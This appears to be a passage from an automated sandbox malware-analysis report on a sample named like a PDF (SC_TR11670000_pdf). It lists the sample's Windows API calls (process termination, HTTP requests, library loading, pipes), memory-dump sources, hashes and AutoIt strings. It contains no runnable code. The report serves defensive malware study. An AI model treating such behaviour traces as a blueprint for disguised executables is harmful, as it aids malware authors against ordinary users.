                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                          • String ID:
                                                                          • API String ID: 43455801-0
                                                                          • Opcode ID: 804c90cf422aebf56c4c1dec0948f23c4740f22b908d6f9f76b5cdb5f4513f89
                                                                          • Instruction ID: 8cd16e08d27883a4dd74c8fe41a46401590a7902ea04cbdbeaf2257261b6db4f
                                                                          • Opcode Fuzzy Hash: 804c90cf422aebf56c4c1dec0948f23c4740f22b908d6f9f76b5cdb5f4513f89
                                                                          • Instruction Fuzzy Hash: 90113C7600010DBFDB019F90EC48EAA3FACEB08390F048021FA08561A1CB759D54DBA0
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B003D3
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B003DB
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B003E6
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B003F1
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B003F9
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B00401
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: 517ca263281c53b5cd76e9ce5941c5d4189d80b806d2477d0c36f1bf6c04b451
                                                                          • Instruction ID: ff4cedb1693c875f1a013169fe2dec4a48fc6155a1e19358d6e329776e9987ff
                                                                          • Opcode Fuzzy Hash: 517ca263281c53b5cd76e9ce5941c5d4189d80b806d2477d0c36f1bf6c04b451
                                                                          • Instruction Fuzzy Hash: 3E016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B4569B
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B456B1
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B456C0
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456CF
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456D9
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: 5650ad6f6cd7c755f8c0bf028e9a44cf6ce20cb531c20c2dd5312dc4d320ca95
                                                                          • Instruction ID: 414e3891e124c2dcebdd22455ef94b2be46caf95dfff19e51f03648cdc339fc3
                                                                          • Opcode Fuzzy Hash: 5650ad6f6cd7c755f8c0bf028e9a44cf6ce20cb531c20c2dd5312dc4d320ca95
                                                                          • Instruction Fuzzy Hash: 20F01D3224155ABBE7215BA2EC0DEBB7A7CEBC7B51F000169FA04D20919AE91A01C6B5
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00B474E5
                                                                          • EnterCriticalSection.KERNEL32(?,?,00AF1044,?,?), ref: 00B474F6
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00AF1044,?,?), ref: 00B47503
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AF1044,?,?), ref: 00B47510
                                                                            • Part of subcall function 00B46ED7: CloseHandle.KERNEL32(00000000,?,00B4751D,?,00AF1044,?,?), ref: 00B46EE1
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B47523
                                                                          • LeaveCriticalSection.KERNEL32(?,?,00AF1044,?,?), ref: 00B4752A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 36380af025cf90736b0197be00d42c6664bb98cefdc1ed7b02c4f98e18a067de
                                                                          • Instruction ID: e45742552b8170f26015bfaca98c85827c40262993935010d84e829a77c4c7dc
                                                                          • Opcode Fuzzy Hash: 36380af025cf90736b0197be00d42c6664bb98cefdc1ed7b02c4f98e18a067de
                                                                          • Instruction Fuzzy Hash: 71F03A3A184613ABDB112B64FC989EA776AFF45302B000571F202A60E0CFB95901DE50
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B38E7F
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00B38E8B
                                                                          • CloseHandle.KERNEL32(?), ref: 00B38E94
                                                                          • CloseHandle.KERNEL32(?), ref: 00B38E9C
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00B38EA5
                                                                          • HeapFree.KERNEL32(00000000), ref: 00B38EAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: bfe19bd48bbae22b9b19d0ef5651086657162256bd9caa8a02ed807c39cd1e8b
                                                                          • Instruction ID: a60ee33ee980f88e76009cce13fc4a0b19a4efabfa0329e68f67ceacbe9d9318
                                                                          • Opcode Fuzzy Hash: bfe19bd48bbae22b9b19d0ef5651086657162256bd9caa8a02ed807c39cd1e8b
                                                                          • Instruction Fuzzy Hash: 28E0C236004002FBDA011FE1FC0C92ABB69FB8A362B108230F229921B0CFBA9420DB50
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58928
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B58A37
                                                                          • VariantClear.OLEAUT32(?), ref: 00B58BAF
                                                                            • Part of subcall function 00B47804: VariantInit.OLEAUT32(00000000), ref: 00B47844
                                                                            • Part of subcall function 00B47804: VariantCopy.OLEAUT32(00000000,?), ref: 00B4784D
                                                                            • Part of subcall function 00B47804: VariantClear.OLEAUT32(00000000), ref: 00B47859
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: 38323d7e1c266134f72fdf80dd73617ff54b1454fd329b5ee8053320d2176a71
                                                                          • Instruction ID: d7ac0d8a3a7de9126755d73319bcc9e129ec0fa91666bb92b302c5dca5909c0c
                                                                          • Opcode Fuzzy Hash: 38323d7e1c266134f72fdf80dd73617ff54b1454fd329b5ee8053320d2176a71
                                                                          • Instruction Fuzzy Hash: 8C919F71608341DFC700DF25C584A6BBBE4EF88355F1449AEF88A9B362DB31E909CB52
                                                                          APIs
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • _memset.LIBCMT ref: 00B43077
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B430A6
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B43159
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B43187
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: 850862ca8997e1c09cb514f0a76489c25f05043499362a117857d3ae1c236f8b
                                                                          • Instruction ID: 387458985d4b54453d5ba32eac353bf471625a13e5ba4e4de78561f7548988ee
                                                                          • Opcode Fuzzy Hash: 850862ca8997e1c09cb514f0a76489c25f05043499362a117857d3ae1c236f8b
                                                                          • Instruction Fuzzy Hash: A751E1716083009AD7159F28D845B6BBBE8EF55B20F080AAEF895E32D0DB74CF44E752
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B3DAC5
                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B3DAFB
                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B3DB0C
                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B3DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                          • String ID: DllGetClassObject
                                                                          • API String ID: 753597075-1075368562
                                                                          • Opcode ID: ec9082dfa0ee425150dfef1e222d95c18613cbb9642b286471704e08b0087d39
                                                                          • Instruction ID: 694890c346971b5ad84e53875edd2f9e66751e790753c1cea28f98dfed08b712
                                                                          • Opcode Fuzzy Hash: ec9082dfa0ee425150dfef1e222d95c18613cbb9642b286471704e08b0087d39
                                                                          • Instruction Fuzzy Hash: 8F417171600208EFDF15CF54E884A9ABBE9EF48350F2580E9ED059F255E7B1DA44CBA0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42CAF
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B42CCB
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00B42D11
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BA6890,00000000), ref: 00B42D5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: 5888acecf46db86ce24dbf2761150a2621e447bad6d5b6d94e5cdef6f79a5b48
                                                                          • Instruction ID: eb325c61fbd3b0ae531568d3209b618326d36afcd0d8c8003ee5d21ed921cbbc
                                                                          • Opcode Fuzzy Hash: 5888acecf46db86ce24dbf2761150a2621e447bad6d5b6d94e5cdef6f79a5b48
                                                                          • Instruction Fuzzy Hash: F741A3705043029FDB10DF24DC85B1AB7E4EF85324F5446ADF966972D1DB70EA04EB92
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B5DAD9
                                                                            • Part of subcall function 00AE79AB: _memmove.LIBCMT ref: 00AE79F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower_memmove
                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                          • API String ID: 3425801089-567219261
                                                                          • Opcode ID: 65d1ddc9789ab44cd91342bcf0d7075767f6203e2a033c6c09bb51661aee0626
                                                                          • Instruction ID: 21d8e8ca3c3b95c7f377fff0a27016f41529c479432b0f30e604cb4060c5c21a
                                                                          • Opcode Fuzzy Hash: 65d1ddc9789ab44cd91342bcf0d7075767f6203e2a033c6c09bb51661aee0626
                                                                          • Instruction Fuzzy Hash: 3531A17190421AABCF10EF64CD81AAEB7F5FF15310F1087A9E865976D1CB71A909CB90
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B393F6
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B39409
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B39439
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: f41aff6c951b33c0278044def442ef4f61d1170164e8277bfaa0198df2a87fdc
                                                                          • Instruction ID: d0e13a275eb2e43b5ff0b9bd6c0254cddbee0f68d988972b96647054a67e7069
                                                                          • Opcode Fuzzy Hash: f41aff6c951b33c0278044def442ef4f61d1170164e8277bfaa0198df2a87fdc
                                                                          • Instruction Fuzzy Hash: C221B171904104BADB28AB75DC85CFFB7A8DF45360F2041A9F926972E1DBB94E0A9620
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B51B40
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B51B66
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B51B96
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00B51BDD
                                                                            • Part of subcall function 00B52777: GetLastError.KERNEL32(?,?,00B51B0B,00000000,00000000,00000001), ref: 00B5278C
                                                                            • Part of subcall function 00B52777: SetEvent.KERNEL32(?,?,00B51B0B,00000000,00000000,00000001), ref: 00B527A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3113390036-3916222277
                                                                          • Opcode ID: fdabef68c7b9660d2f9d10b136b3df20b074a8fdd397d08d9e13c8d6ffdc144c
                                                                          • Instruction ID: 11837403e21247b366bff5038e7933658333a944a160fa964306ac7ba924e693
                                                                          • Opcode Fuzzy Hash: fdabef68c7b9660d2f9d10b136b3df20b074a8fdd397d08d9e13c8d6ffdc144c
                                                                          • Instruction Fuzzy Hash: 2E21BEB1500209BFEB119F289CC5FBB77ECEB4974AF1005EAF905A7240EA649D089761
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B666D0
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00B666D7
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B666EC
                                                                          • DestroyWindow.USER32(?), ref: 00B666F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: 08ba6a998a96465365f09b250ef2ebf5506fb336186588103ccbf016bd42d694
                                                                          • Instruction ID: 3b6437d2b6022df26a1e712c451f2e9d689d439a6d7b86be537003df8483fcbc
                                                                          • Opcode Fuzzy Hash: 08ba6a998a96465365f09b250ef2ebf5506fb336186588103ccbf016bd42d694
                                                                          • Instruction Fuzzy Hash: DD216AB1600206ABEF104F64EC81EFB77EDEB59368F104669FA11931A0DBB9DC519760
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B4705E
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B47091
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B470A3
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B470DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: dbf56367c000ddac8b3fc686775ee6e8b0e569a035069d7e6d6f50187b6fff1a
                                                                          • Instruction ID: a3b734090e98891a498dc30cec303d0cd25346353e379bf40c1d6b43cbe511d5
                                                                          • Opcode Fuzzy Hash: dbf56367c000ddac8b3fc686775ee6e8b0e569a035069d7e6d6f50187b6fff1a
                                                                          • Instruction Fuzzy Hash: 3221817454520AABDF209F78DC05A9A77E8FF45720F204AA9FCA0D73D0DBB09A40DB51
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B4712B
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B4715D
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B4716E
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B471A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: d4c8018f9d968666574bdefa0d0cdd8dc805a3399157393c670fab7fc03ddb46
                                                                          • Instruction ID: a7df1dbf79c6c7ef89e76c0bb35a75470dc82e945c2c0a3c04fe8e5906049a20
                                                                          • Opcode Fuzzy Hash: d4c8018f9d968666574bdefa0d0cdd8dc805a3399157393c670fab7fc03ddb46
                                                                          • Instruction Fuzzy Hash: 2021C5755843069BDF209F689C44AAAB7E8EF55730F200A99FCB0E32D0DF709A41DB51
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4AEBF
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B4AF13
                                                                          • __swprintf.LIBCMT ref: 00B4AF2C
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B6F910), ref: 00B4AF6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
